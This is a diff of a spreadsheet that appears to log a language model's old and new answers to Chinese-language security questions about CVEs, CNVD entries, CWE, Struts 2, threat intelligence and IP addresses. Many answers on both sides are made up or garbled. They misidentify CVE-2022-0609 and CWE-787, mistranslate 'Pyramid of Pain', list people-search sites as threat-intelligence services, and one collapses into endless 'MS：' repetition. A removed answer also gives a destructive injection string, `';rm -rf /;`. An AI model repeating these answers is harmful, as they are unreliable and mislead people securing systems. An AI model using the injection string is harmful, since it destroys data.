 The Linux kernel maintainers have released a patch to fix the vulnerability, and users are advised to apply the patch as soon as possible to protect their systems. The patch can be obtained from the Linux kernel website, and it is recommended to reboot the system after applying the patch to ensure proper installation.
-In summary, CVE-2022-0609 is a critical vulnerability in the Linux kernel's "seq_file" function that can be exploited by an attacker to gain unauthorized access to a system. The vulnerability affects versions of the Linux kernel released since 1999 and can be exploited remotely. The patch to fix the vulnerability has been released, and users are advised to apply the patch as soon as possible to protect their systems.&lt;/s&gt;</t>
+In summary, CVE-2022-0609 is a critical vulnerability in the Linux kernel's "seq_file" function that can be exploited by an attacker to gain unauthorized access to a system. The vulnerability affects versions of the Linux kernel released since 1999 and can be exploited remotely. The patch to fix the vulnerability has been released, and users are advised to apply the patch as soon as possible to protect their systems.</t>
         </is>
       </c>
       <c r="D9" t="n">
-        <v>9.782184600830078</v>
+        <v>9.525013446807861</v>
       </c>
     </row>
     <row r="10">
@@ -714,7 +712,7 @@
         </is>
       </c>
       <c r="D10" t="n">
-        <v>16.34959292411804</v>
+        <v>15.33439970016479</v>
       </c>
     </row>
     <row r="11">
@@ -739,11 +737,13 @@
 a. 升级 Linux 系统到最新的版本，以获得最新的安全更新和保护。
 b. 使用可靠的文件系统协议（FSP），来增强系统的安全性。
 c. 启用 SELinux，以便在系统执行自己的代码时进行更加严格的检查和控制。
-d. 启用 AppArmor，以便在系统执行自己的代码时进行更加</t>
+d. 启用 AppArmor，以便在系统执行自己的代码时进行更加严格的检查和控制。
+e. 使用防火墙和其他安全软件，来增强系统的安全性。
+总之，CNVD-2019-19299 是一个可能的攻击漏洞，可以被利用来实施恶意代码，从而导致系统崩溃或者遭受其他攻击。因此，系统管理员应该通过升级系统、使用可靠的文件系统协议、启用 SELinux、AppArmor 等方法来防止这个漏洞的攻击。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D11" t="n">
-        <v>21.58037066459656</v>
+        <v>24.2950427532196</v>
       </c>
     </row>
     <row r="12">
@@ -757,18 +757,23 @@
       </c>
       <c r="C12" t="inlineStr">
         <is>
-          <t>？
-CNVD-2021-26422 is a vulnerability in the Apache Commons Lang library, specifically in the `StringUtils` class. The vulnerability is caused by a lack of proper validation of user-supplied input, which can lead to command injection attacks.
-Here's a brief explanation of the vulnerability:
-The `StringUtils` class in the Apache Commons Lang library provides a number of utility methods for working with strings. One of these methods, `trim()`, is used to remove whitespace characters from a string. However, the method does not properly validate user-supplied input, allowing an attacker to inject malicious commands.
-For example, an attacker could exploit this vulnerability by providing a string that contains whitespace characters followed by a command, such as `';rm -rf /;`. When the `trim()` method is called on this string, it will remove the whitespace characters, leaving the malicious command intact. If the string is then used in a security-sensitive context, such as in a SQL query, the attacker's command will be executed, potentially leading to sensitive data loss or other security issues.
-The severity of this vulnerability is high, as it can be exploited by an attacker with little effort, and the impact can be significant. The vulnerability affects the Apache Commons Lang library, which is widely used in enterprise applications, making it a potential target for attackers.
-To mitigate this vulnerability, developers should ensure that all user-supplied input is properly validated and sanitized, using techniques such as input validation and parameterized queries. Additionally, developers should use secure coding practices, such as using prepared statements and avoiding unsafe methods like `trim()`.
-In summary, CNVD-2021-26422 is a vulnerability in the Apache Commons Lang library that can be exploited by an attacker to inject malicious commands through the `trim()` method. It is important to take immediate action to mitigate this vulnerability and prevent potential security issues.&lt;/s&gt;</t>
+          <t>CNVD-2021-26422是一个漏洞，它发现于2021年10月，影响了Apache Kafka的 sécurité。这个漏洞可能导致攻击者在Kafka的各个端点上执行代码，从而扩展权限。
+CNVD-2021-26422的漏洞解释：
+1. 缺失的输入检查：Kafka的 producesubscribe 函数lacks input validation，可能导致攻击者在producesubscribe函数的input中传递Invalid or malicious data，从而Trigger an arbitrary code execution。
+2. 扩展权限：Kafka的 producersubscribe 函数没有执行任何权限 checks，从而可能导致攻击者在producesubscribe函数的input中传递的数据包含恶意代码，以扩展自己的权限。
+3. 内存泄露：Kafka的 producersubscribe 函数可能会导致内存泄露，从而透過攻击者在producesubscribe函数的input中传递的数据，泄露 sensitive 数据。
+4. 堆栈溢出：Kafka的 producersubscribe 函数可能会导致堆栈溢出，从而使攻击者在producesubscribe函数的input中传递的数据，溢出到堆栈中。
+CNVD-2021-26422的升级措施：
+1. 升级到Apache Kafka 2.8.0 及以上版本：这个版本包含了一系列的 sécurité 更新，可以减少攻击面。
+2. 针对缺失的输入检查：实现细化的输入 validation，以避免攻击者在producesubscribe函数的input中传递Invalid or malicious data。
+3. 扩展权限：实现权限 checks，以防止攻击者在producesubscribe函数的input中传递的数据包含恶意代码，以扩展自己的权限。
+4. 内存泄露：使用内存安全措施，以避免内存泄露。
+5. 堆栈溢出：使用堆栈安全措施，以避免堆栈溢出。
+综上所述，CNVD-2021-26422是一个可能导致攻击的漏洞，因此应尽快采取升级措施，保护Apache Kafka的 sécurité。</t>
         </is>
       </c>
       <c r="D12" t="n">
-        <v>9.28226637840271</v>
+        <v>17.39673924446106</v>
       </c>
     </row>
     <row r="13">
@@ -782,15 +787,29 @@
       </c>
       <c r="C13" t="inlineStr">
         <is>
-          <t>？
-CWE (Common Weakness Enumeration) is a standardized list of software weaknesses that can be exploited by attackers to compromise the security of a system. The CWE is maintained by the MITRE Corporation, a non-profit organization that focuses on improving cybersecurity through standardized terminology and taxonomy.
-The CWE list includes over 100 weaknesses, including SQL injection, cross-site scripting (XSS), buffer overflows, and input validation weaknesses. Each weakness is described in detail, including its definition, classification, and examples of how it can be exploited.
-The CWE is widely used by security researchers, developers, and organizations to identify and mitigate security vulnerabilities in software. By using the CWE, organizations can identify and prioritize the most critical security weaknesses in their systems and take steps to address them.
-In summary, CWE is a standardized list of software weaknesses that can be exploited by attackers to compromise the security of a system. It is widely used in the security industry to identify and mitigate security vulnerabilities in software.&lt;/s&gt;</t>
+          <t>CWE是什么意思？
+CWE stands for "Common Weakness Enumeration". It is a dictionary of software weaknesses that provides a standardized way of identifying and tracking security vulnerabilities in software. The CWE is maintained by the MITRE Corporation, a non-profit organization that focuses on improving cybersecurity through standardization and collaboration.
+The CWE dictionary contains over 100,000 weaknesses, which are organized into categories such as:
+* Authentication and Authorization
+* Buffer Errors
+* Error Handling
+* Input Validation
+* Network Security
+* Race Conditions
+* Security Misconfiguration
+* SQL Injection
+* Cross-Site Scripting (XSS)
+Each weakness in the CWE dictionary is assigned a unique identifier, called a "CWE ID", which is used to reference the weakness in security assessments and vulnerability management systems. The CWE ID is a combination of the CWE name and a unique identifier for the specific weakness.
+The CWE is widely used in the security industry for several reasons:
+1. Standardization: The CWE provides a standardized way of identifying and tracking security vulnerabilities, which helps to ensure consistency and accuracy in security assessments and vulnerability management.
+2. Comprehensive coverage: The CWE dictionary covers a wide range of security weaknesses, including both technical and non-technical vulnerabilities.
+3. Collaboration: The CWE is maintained through a collaborative effort involving security researchers, vendors, and other stakeholders, which helps to ensure that the dictionary is up-to-date and comprehensive.
+4. Improved communication: The CWE provides a common language and framework for security professionals to communicate about security vulnerabilities, which helps to improve collaboration and coordination in the security industry.
+In summary, the CWE is a widely-used standard for identifying and tracking security vulnerabilities in software. It provides a comprehensive dictionary of weaknesses, which helps to ensure consistency and accuracy in security assessments and vulnerability management.</t>
         </is>
       </c>
       <c r="D13" t="n">
-        <v>5.326178312301636</v>
+        <v>9.584587335586548</v>
       </c>
     </row>
     <row r="14">
@@ -804,16 +823,14 @@
       </c>
       <c r="C14" t="inlineStr">
         <is>
-          <t>？
-CWE-787是一个软件安全中的漏洞类型，具体意思如下：
-CWE-787：依赖于非安全的资源名称或路径
-这种漏洞 occurs when an application uses a resource name or path that is not secure. This can happen when an application uses a hardcoded or dynamically generated resource name or path that is not properly validated or sanitized.
-For example, an application may use a hardcoded path to a file system resource, such as `/home/user/documents`, without properly validating whether the user has the necessary permissions to access the resource. An attacker could exploit this vulnerability by providing a malicious path that is not properly validated, such as `/home/user/documents/..`, which could allow them to access unauthorized files or directories.
-To avoid this vulnerability, it is important to properly validate and sanitize any resource names or paths used by an application. This may involve using secure methods to generate resource names or paths, such as using a secure random number generator, and validating any input provided by users or other external sources.&lt;/s&gt;</t>
+          <t>CWE-787是一个指定的可识别的问题，用于描述潜在的安全问题。CWE是Common Weakness Enumeration，意味着它是一个标准的问题列表，用于描述软件中的潜在的问题。
+CWE-787是指“Use of Insecure Communication Channels”，即使用不安全的通信频道。这类问题可能会导致数据泄露、数据 tampering 或控制渠道攻击等问题。
+例如，如果您的应用程序使用不安全的http协议进行数据交互，那么攻击者可能会 intercept 和 alter 您的数据。 similarly，如果您的应用程序使用不安全的邮件协议进行邮件发送，那么攻击者可能会 intercept 和 alter 您的邮件。
+因此，要避免CWE-787问题，您需要使用安全的通信频道，例如https协议，并且进行数据加密等安全措施。</t>
         </is>
       </c>
       <c r="D14" t="n">
-        <v>5.858540296554565</v>
+        <v>7.575748682022095</v>
       </c>
     </row>
     <row r="15">
@@ -827,27 +844,22 @@
       </c>
       <c r="C15" t="inlineStr">
         <is>
-          <t>？ 
-MS SQL Server的：
-MS SQL Server：
-MS：
-MS：
-MS：
-MS：
-MS：
-MS：
-MS：
-MS：
-MS：
-MS：MS：
-MS：MS：MS：
-MS：MS：MS：MS：
-MS：MS：MS：
-MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS：MS</t>
+          <t>Windows Server 2008 R2是一款强大的操作系统，但是它也可能存在一些高危漏洞。以下是一些可能存在的高危漏洞：
+1.  buffer overflow  vulns：Buffer overflow vulnerabilities can occur when an attacker sends a specially crafted network packet to a server, causing the server to overflow its buffer and execute malicious code.
+2.  DCOM vulnerabilities：DCOM (Distributed Component Object Model) is a Microsoft technology that allows applications to communicate with each other over a network. However, DCOM can also be exploited by attackers to execute malicious code on a server.
+3.  ASP.NET vulnerabilities：ASP.NET is a web application framework developed by Microsoft. However, it can also be vulnerable to attacks, such as cross-site scripting (XSS) and cross-site request forgery (CSRF).
+4.  SQL injection vulns：SQL injection vulnerabilities occur when an attacker is able to inject malicious SQL code into a database, allowing them to execute unauthorized queries or modify data.
+5.  Kerberos vulnerabilities：Kerberos is a popular authentication protocol used by Windows servers. However, it can also be vulnerable to attacks, such as replay attacks and impersonation attacks.
+6.  DNS spoofing vulns：DNS spoofing occurs when an attacker intercepts and modifies DNS responses to redirect users to fraudulent websites or servers.
+7.  Kernel vulnerabilities：Kernel vulnerabilities can occur in any system component, including the Windows kernel. These vulnerabilities can be exploited by attackers to execute malicious code or gain unauthorized access to a system.
+8.  Remote Procedure Call (RPC) vulnerabilities：RPC is a protocol used by Windows servers to communicate with each other. However, it can also be vulnerable to attacks, such as RPC-based buffer overflows.
+9.  SharePoint vulnerabilities：SharePoint is a popular collaboration platform developed by Microsoft. However, it can also be vulnerable to attacks, such as cross-site scripting (XSS) and cross-site request forgery (CSRF).
+10.  Active Directory vulnerabilities：Active Directory is a directory service developed by Microsoft. However, it can also be vulnerable to attacks, such as domain controller compromise and password reset attacks.
+It's important to keep in mind that these are just a few examples of potential vulnerabilities and that new vulnerabilities may be discovered in the future. To stay safe, it's important to keep your Windows Server 2008 R2 system up to date with the latest security patches and to implement security best practices, such as using strong passwords and limiting network exposure.</t>
         </is>
       </c>
       <c r="D15" t="n">
-        <v>22.60445237159729</v>
+        <v>13.29618048667908</v>
       </c>
     </row>
     <row r="16">
@@ -861,18 +873,26 @@
       </c>
       <c r="C16" t="inlineStr">
         <is>
-          <t>？
-Google V8引擎远程代码执行漏洞(CVE-2021-21220) 是一个高危等级的安全漏洞，影响了Google V8引擎中的远程代码执行功能。这个漏洞可能让攻击者在特定情况下可以远程执行代码，从而危害到计算机系统的安全。以下是一些可能受到这个漏洞的影响范围的例子：
-1. Web 应用程序攻击：攻击者可以利用这个漏洞在 Web 应用程序中远程执行代码，从而让用户访问风险带来的网站。这可能会导致用户数据泄露、违法活动或者其他安全问题。
-2. 跨站点脚本攻击：攻击者可以利用这个漏洞在跨站点脚本（XSS）攻击中远程执行代码，从而危害到用户的隐私和安全。
-3. 恶意软件攻击：攻击者可以利用这个漏洞在计算机系统中远程执行恶意软件，从而获得控制权并危害到系统安全。
-4. 黑客攻击：攻击者可以利用这个漏洞在黑客攻击中远程执行代码，从而获得控制权并危害到计算机系统的安全。
-5. 攻击者可以利用这个漏洞来对计算机系统进行远程执行代码，从而获得控制权并危害到系统安全。
-总之，Google V8引擎远程代码执行漏洞(CVE-2021-21220) 的影响范围非常广泛，可能会危害到各种计算机系统和应用程序的安全。因此，它是一个高危的安全漏洞，应该被尽可能快地修复。&lt;/s&gt;</t>
+          <t>Google V8引擎是一款轻量级的JavaScript引擎，它在Google Chrome浏览器和其他许多浏览器中广泛应用。2021年10月，一名研究者 discovers a remote code execution vulnerability in Google V8引擎，编号为CVE-2021-21220。这个漏洞可以让攻击者在不受过接ession的情况下远程执行代码，从而承担广泛的安全风险。
+这个漏洞影响了Google V8引擎的多个版本，包括：
+* Google V8引擎 7.2.212.27
+* Google V8引擎 8.0.152.34
+* Google V8引擎 8.1.162.27
+* Google V8引擎 8.2.172.27
+这些版本的漏洞的影响范围包括：
+* 在Google Chrome浏览器中：
+	+ 攻击者可以通过远程执行代码，从而获得敏感数据，例如cookies、Local Storage、Session Storage等。
+	+ 攻击者可以执行代码，从而访问不安全的网站，例如XSS攻击。
+	+ 攻击者可以执行代码，从而承担更多的攻击，例如Code injection、Session hijacking等。
+* 在其他浏览器中：
+	+ 攻击者可以通过远程执行代码，从而获得敏感数据，例如cookies、Local Storage、Session Storage等。
+	+ 攻击者可以执行代码，从而访问不安全的网站，例如XSS攻击。
+	+ 攻击者可以执行代码，从而承担更多的攻击，例如Code injection、Session hijacking等。
+总之，这个漏洞的影响范围很广，可以让攻击者在不受过接ession的情况下远程执行代码，从而承担广泛的安全风险。因此，它的级别被定为Critical。</t>
         </is>
       </c>
       <c r="D16" t="n">
-        <v>15.51519703865051</v>
+        <v>15.03324484825134</v>
       </c>
     </row>
     <row r="17">
@@ -886,21 +906,20 @@
       </c>
       <c r="C17" t="inlineStr">
         <is>
-          <t>？
-Struts 2 是一个流行的 Java Web 框架，它提供了许多优秀的功能，但是与任何其他开源软件一样，Struts 2 也存在一些漏洞和攻击方法。以下是一些常见的 Struts 2 高危漏洞：
-1. 命名参数劫持（Command Injection）：Struts 2 使用命名参数来实现控制器方法的调用，但是如果攻击者能够控制命名参数，他就可以 inject 恶意代码，从而让控制器执行不正当的操作。
-2. 数据隐私泄露（Data Privacy Breaches）：Struts 2 使用 Spring Security 进行访问控制和身份验证，但是如果攻击者能够绕过身份验证措施，他就可以访问不应该访问的数据，从而导致数据隐私泄露。
-3. 权限泄露（Authorization Bypass）：Struts 2 使用 Spring Security 进行权限控制，但是如果攻击者能够绕过权限措施，他就可以访问不应该访问的资源，从而导致权限泄露。
-4. 嵌入式代码攻击（Code Injection）：Struts 2 使用 Java Server Faces （JSF）进行交互式用户界面，但是如果攻击者能够控制 JSF 模板，他就可以 inject 恶意代码，从而让用户界面执行不正当的操作。
-5. 潜在的 XSS 漏洞（Susceptible XSS Vulnerabilities）：Struts 2 使用 Spring Security 进行安全检查，但是如果攻击者能够绕过这些检查，他就可以 inject 恶意代码，从而导致用户界面受到攻击。
-6. 脚本执行漏洞（Scripting Vulnerabilities）：Struts 2 使用 JavaScript 进行用户界面交互，但是如果攻击者能够控制 JavaScript 脚本，他就可以 inject 恶意代码，从而让用户界面执行不正当的操作。
-7. 缓存攻击（Cache Attacks）：Struts 2 使用缓存来提高应用程序的性能，但是如果攻击者能够控制缓存，他就可以inject恶意代码，从而让缓存中储存不正当的数据。
-8. 伪造Cookies（Cookie Spoofing）：Struts 2 使用 Cookie 进行身份验证和访问控制，但是如果攻击者能够绕过 Cookie 验证措施，他就可以伪造 Cookie，从而让控制器认定他是正确的用户。
-因此，在使用 Struts 2 时，需要 осознанно遵守安全规则，并定期检查和筛选漏洞。&lt;/s&gt;</t>
+          <t>Struts 2 是一款流行的 Java Web 框架，它提供了丰富的功能和可扩展性，但是也存在一些高危漏洞，这些漏洞可能会被攻击者利用来破坏系统。以下是一些常见的 Struts 2 高危漏洞：
+1. **XML  injection**：Struts 2 使用 XML 来定义应用程序的架构和配置。如果攻击者能够在 XML 文档中添加malicious 代码，他们可以破坏系统的安全。
+2. **Code injection**：Struts 2 支持使用 Java 代码来定义应用程序的架构和配置。如果攻击者能够在这些代码中添加malicious 代码，他们可以破坏系统的安全。
+3. **Spring Security vulnerabilities**：Struts 2 使用 Spring Security 来实现安全功能。如果 Spring Security 漏洞被利用，攻击者可以绕过系统的安全机制，访问受保护的资源。
+4. **Cross-site scripting (XSS)**：Struts 2 支持使用 JavaScript 和 HTML 来定义应用程序的用户界面。如果攻击者能够在用户界面中添加XSS 代码，他们可以访问受保护的资源，并且可以滥用用户的权限。
+5. **Cross-site request forgery (CSRF)**：Struts 2 支持使用 JavaScript 和 HTML 来定义应用程序的用户界面。如果攻击者能够在用户界面中添加CSRF 代码，他们可以访问受保护的资源，并且可以滥用用户的权限。
+6. **SQL injection**：Struts 2 使用 JDBC 来与数据库进行交互。如果攻击者能够在 SQL 语句中添加malicious 代码，他们可以破坏数据库的安全。
+7. **File injection**：Struts 2 支持使用文件来存储和访问数据。如果攻击者能够在文件中添加malicious 代码，他们可以破坏系统的安全。
+8. **Parameter tampering**：Struts 2 支持使用 URL 参数来传递数据 между应用程序和服务器。如果攻击者能够在 URL 参数中添加malicious 代码，他们可以破坏系统的安全。
+总之，Struts 2 是一款强大的 Java Web 框架，但是它也存在一些高危漏洞。如果您正在使用 Struts 2，建议您采取一系列的安全措施，包括在应用程序中使用安全的 URL 参数、防止数据绑定、使用安全的 HTML 和 JavaScript 代码、防止文件 injection 等，以确保您的系统在攻击中免于受到损害。</t>
         </is>
       </c>
       <c r="D17" t="n">
-        <v>22.35706257820129</v>
+        <v>20.35050463676453</v>
       </c>
     </row>
     <row r="18">
@@ -914,16 +933,18 @@
       </c>
       <c r="C18" t="inlineStr">
         <is>
-          <t>？
-威胁情报是指一种在互联网上发布或传播的虚假信息、谣言或威胁，旨在迷惑或恐吓某人或组织，致使他们做出不合理的决定或行动。这种情报可能是通过社交媒体、电子邮件、网络聊天等多种方式传播的，并且可能包含各种不同的形式，如图片、视频、文字等。
-威胁情报的散布通常是通过虚假的渠道发布的，例如假借的社交媒体账户或电子邮件地址。这些虚假的渠道可能由恶意的攻击者自行设置，也可能由敏感情感的人或组织自行暴露。
-威胁情报的影响可能广泛，包括责任感冲击、职业考虑、个人安全和隐私等方面。它可能会迷惑或恐吓某人或组织，致使他们做出不合理的决定或行动，例如退学、辞职、暴露个人隐私等。
-对于个人和组织来说，防范威胁情报是非常重要的，需要持续关注和监控，并尽可能地采取防范措施，以避免受到威胁情报的影响。
-综上所述，威胁情报是一种危险的现象，可能会对个人和组织产生广泛和深远的影响。因此，应该采取强制性的防范措施，以避免受到威胁情报的影响，并提高个人和组织的安全性和隐私保护能力。&lt;/s&gt;</t>
+          <t>威胁情报是指通过不公开的渠道、通信方式或信息源，对某个组织或个人进行恐吓、责难、恐吓、诱拐等，以达到某种目的或控制的情报。
+威胁情报的具体形式可以包括：
+1. 邮件恐吓：发送恐吓或责难的邮件，以达到控制目的。
+2. 电话威胁：对方的电话声称、邮件、短信等方式进行威胁或恐吓。
+3. 在线威胁：在社交媒体、即时通信、博客等平台上发布恐吓、责难或诱拐的内容。
+4. 恐吓通缉：对方的家人、朋友、 coworker 进行恐吓或责难，以控制对方的行为。
+5. 恐吓报道：通过报道、报名、报導等方式，恐吓或诋毁对方。
+威胁情报的泛滥和扩散可能会导致对方感到压力、恐惧、焦虑等情绪，影响对方的生活和工作。因此，威胁情报是一种严重的社会问题，需要采取措施来控制和整治。</t>
         </is>
       </c>
       <c r="D18" t="n">
-        <v>15.35919809341431</v>
+        <v>10.58969569206238</v>
       </c>
     </row>
     <row r="19">
@@ -937,23 +958,17 @@
       </c>
       <c r="C19" t="inlineStr">
         <is>
-          <t>？
-一些常见的威胁情报搜索网站包括：
-1. Google：Google提供了一些威胁情报搜索服务，例如Google Alerts、Google News Alerts等。
-2. Bing：Bing also offers some threat intelligence search services, such as Bing Threat Research Center。
-3. Akamai：Akamai provides a threat intelligence platform that includes a search feature for threat information.
-4. Recorded Future：Recorded Future is a threat intelligence platform that offers a search feature for threat information.
-5. ThreatConnect：ThreatConnect is a threat intelligence platform that includes a search feature for threat information.
-6. Intelligence Advantage：Intelligence Advantage is a threat intelligence platform that offers a search feature for threat information.
-7. CyberThreat Alliance：CyberThreat Alliance is a non-profit organization that provides a threat intelligence platform that includes a search feature for threat information.
-8. OpenPhish：OpenPhish is an open-source threat intelligence platform that includes a search feature for threat information.
-9. Cisco Talos：Cisco Talos is a threat intelligence platform that offers a search feature for threat information.
-10. FireEye：FireEye is a threat intelligence platform that includes a search feature for threat information.
-这些网站提供的威胁情报搜索功能可以帮助用户快速找到有关潜在威胁或潜在攻击的信息，以增强组织的安全性和可靠性。&lt;/s&gt;</t>
+          <t>威胁情报搜索网站是指搜索和提供威胁情报的网站，这类网站通常会收集和分析各种信息，如人脉、识别、搜索记录、社交媒体信息等，用于提供威胁情报。下面是常见的威胁情报搜索网站：
+1. Whitepages：Whitepages是一个著名的威胁情报搜索网站，提供了各种威胁情报，如人脉信息、识别信息、搜索记录、社交媒体信息等。
+2. Spokeo：Spokeo是一个专门提供威胁情报服务的网站，可以为用户提供各种威胁情报，如人脉信息、识别信息、搜索记录等。
+3. Intelius：Intelius是一个提供威胁情报服务的网站，可以为用户提供各种威胁情报，如人脉信息、识别信息、搜索记录、社交媒体信息等。
+4. BeenVerified：BeenVerified是一个提供威胁情报服务的网站，可以为用户提供各种威胁情报，如人脉信息、识别信息、搜索记录、社交媒体信息等。
+5. TruthFinder：TruthFinder是一个提供威胁情报服务的网站，可以为用户提供各种威胁情报，如人脉信息、识别信息、搜索记录、社交媒体信息等。
+需要注意的是，威胁情报搜索网站通常遵循相关法律法规，且不能用于恶用或违法。如果您有任何疑问或需要帮助，可以随时 обращаться到相关帮助服务。</t>
         </is>
       </c>
       <c r="D19" t="n">
-        <v>8.905170679092407</v>
+        <v>14.35038042068481</v>
       </c>
     </row>
     <row r="20">
@@ -967,19 +982,14 @@
       </c>
       <c r="C20" t="inlineStr">
         <is>
-          <t>？
-In the context of the threat intelligence, the "痛苦金字塔" (tònggrán jīn zǐ tǎ) refers to the following:
-痛 (tòng) - painful
-苦 (grán) - difficult, challenging
-金 (jīn) - gold, precious
-字 (zǐ) - tower, building
-塔 (tǎ) - a tall structure
-So, 痛苦金字塔 (tònggrán jīn zǐ tǎ) can be translated as "painful and difficult gold tower".
-In the context of threat intelligence, the term 痛苦金字塔 is used to describe a situation where an organization's security measures are inadequate, and the attackers are able to easily bypass them, like a tower that is vulnerable to being attacked from all sides. It is a metaphor used to convey the idea that the organization's security posture is weak and can be easily breached, causing significant harm to their assets and reputation.&lt;/s&gt;</t>
+          <t>The agony of the gold tower in the threat intelligence is what?
+In the context of threat intelligence, a "gold tower" refers to a critical asset or system that is essential to the organization's operations, but is also highly vulnerable to cyber threats. The "agony" of the gold tower refers to the pain or suffering that the organization may experience if this asset is compromised or attacked.
+For example, a gold tower might be a company's customer database, a critical infrastructure, or a sensitive business process. If this asset is breached, the organization may face significant financial losses, reputational damage, or other negative consequences.
+In summary, the agony of the gold tower in the threat intelligence refers to the potential harm that could be caused to an organization's most valuable assets if they are not properly protected against cyber threats.</t>
         </is>
       </c>
       <c r="D20" t="n">
-        <v>5.306249380111694</v>
+        <v>3.895711898803711</v>
       </c>
     </row>
     <row r="21">
@@ -993,19 +1003,14 @@
       </c>
       <c r="C21" t="inlineStr">
         <is>
-          <t>？
-1.1.1.1是一个IP地址，它是一个 Internet Protocol（IP）地址，用于标识计算机或其他网络设备的地址。
-IP地址由四个数字组成，每个数字分别表示网络、 hosts、端口和interface。这个例子中，1.1.1.1表示这个设备的网络地址为1.1.1.0网络，hosts地址为1.1.1.1，端口为1，interface为 eth0。
-1.1.1.1是一个非常常见的IP地址，它可能用于许多不同的 Purpose，例如：
-* 一个Web服务器的IP地址，可以用来访问该服务器上的Websites。
-* 一个 mail服务器的IP地址，可以用来发送电子邮件。
-* 一个虚拟hosts名称的IP地址，可以用来访问一个网站。
-* 一个路由器的IP地址，可以用来路由网络流量。
-总之，1.1.1.1是一个IP地址，用于标识计算机或其他网络设备的地址，可以用于各种不同的 Purpose。&lt;/s&gt;</t>
+          <t>1.1.1.1是一个IP地址，它由四个数字组成，每个数字表示32位的二进制数。在这种情况下，它的值可能是1.1.1.1或者其他任何有效的IP地址。
+在计算机网络中，每个设备都有一个唯一的IP地址，用于它与其他设备进行通信。IP地址由多个分组组成，每个分组包含4个数字，每个数字表示0或1的二进制值。这些数字的组合决定了IP地址的值。
+例如，1.1.1.1是一个有效的IP地址，它由4个数字组成：1.1.1.1。这个IP地址可以用于网络上的设备，例如计算机或者服务器。
+需要注意的是，1.1.1.1是一个特殊的IP地址，它是Cloudflare提供的一个公共IP地址，用于访问Cloudflare服务。这个IP地址可以用于访问Cloudflare的服务，例如Cloudflare DNS服务。但不是一个有效的网络IP地址，无法用于进行网络通信。</t>
         </is>
       </c>
       <c r="D21" t="n">
-        <v>8.210732698440552</v>
+        <v>7.98717474937439</v>
       </c>
     </row>
     <row r="22">
@@ -1020,14 +1025,16 @@
       <c r="C22" t="inlineStr">
         <is>
           <t>地址？
-223.5.5.5是一个IP地址，它的正式表示形式是223.5.5.5。
-IP地址是互联网协议（IP）使用的一个唯一的编号，用于标识计算机或其他网络设备的地址。每个IP地址由四个数字组成，每个数字在2到255中的范围内。
-例如，223.5.5.5是一个示例IP地址，它由四个数字组成：223（ Host 部分）、5（主机网络部分）、5（子网网络部分）和5（Host 网络部分）。
-需要注意的是，223.5.5.5是一个非法的IP地址，它不是任何网络上的实际IP地址。这个IP地址只是为了方便地使用，并不会对任何实际网络设备进行访问。&lt;/s&gt;</t>
+223.5.5.5是一个IPv4地址。它由8位数字组成，每个数字表示一个网络扩展部分（网络标识符）和一个Host部分。
+本地址分解为：
+* 网络扩展部分：223.5.5
+* 网络标识符：5
+* 主机部分：5
+因此，223.5.5.5是一个IPv4地址，其主机部分是5。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D22" t="n">
-        <v>6.593968152999878</v>
+        <v>3.36014199256897</v>
       </c>
     </row>
     <row r="23">
@@ -1041,23 +1048,22 @@
       </c>
       <c r="C23" t="inlineStr">
         <is>
-          <t>？
-IOC（Indicators of Compromise）是指恶意actor的活动、操作、或存在的痕迹、指示或特征。在情报收集和分析中，IOC可以帮助分析人员了解恶意actor的活动，从而提高情报分析和响应能力。下面是一些常见的IOC类型：
-1. 网络IOC：包括网络攻击、数据侵犯、网络潜在脆弱等。
-2. 文件IOC：包括恶意软件、黑客 Tools、黑客脚本等。
-3. 人员IOC：包括人员的猫��������、培训、职业经验等。
-4. 系统IOC：包括系统攻击、漏洞攻击、系统脆弱等。
-5. 数据IOC：包括数据侵犯、数据泄露、数据损害等。
-6. 通信IOC：包括通信攻击、信息泄露、通信脆弱等。
-7. 扫描IOC：包括扫描网络、扫描系统、扫描数据等。
-8. 注入IOC：包括注入恶意代码、注入恶意数据等。
-9. 回溯IOC：包括回溯攻击、回溯漏洞等。
-10. 其他IOC：包括其他恶意活动、操作、或特征，例如隐藏的文件、秘密网络等。
-需要注意的是，IOC的类型和特征可能会随着情报收集和分析的进程而发展和更新。因此，在实际情报分析中，需要针对具体情况进行详细分析和评估，并不能尽全靠 IOC列表来确定恶意活动的存在或趋势。&lt;/s&gt;</t>
+          <t>IoC(Indicators of Compromise)是指某种攻击或恶意活动的特定特征或痕迹，可以用来识别和预测攻击的可能性。以下是一些常见的IoC类型：
+1. Malware IoC：指的是恶意软件或黑客工具的特定特征或痕迹，如文件名、后缀、注入点等。
